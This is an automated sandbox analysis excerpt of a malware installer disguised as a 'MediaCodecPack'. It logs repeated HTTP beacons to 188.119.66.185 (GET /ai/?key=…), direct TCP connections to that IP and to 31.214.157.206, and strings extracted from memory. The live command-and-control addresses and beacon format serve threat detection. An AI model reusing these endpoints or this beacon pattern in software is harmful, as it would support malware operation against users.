                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D42B95 WSASetLastError,WSARecv,WSASetLastError,select,3_2_02D42B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: Hbq580QZAR.tmp, 00000001.00000002.2736047862.0000000005AEC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1494194059.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, is-K5SAB.tmp.1.dr, mediacodecpack.exe.1.drString found in binary or memory: http://wonderwork.ucoz.com/
                    Source: Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: Hbq580QZAR.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: Hbq580QZAR.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/C
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/H
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/d
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-US
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/h
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/mCertificates
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/p4
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/v
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/z
                    Source: Hbq580QZAR.exe, 00000000.00000003.1480741810.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000002.2734183284.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1480816119.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734658313.0000000002128000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734157494.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482724370.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482802130.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
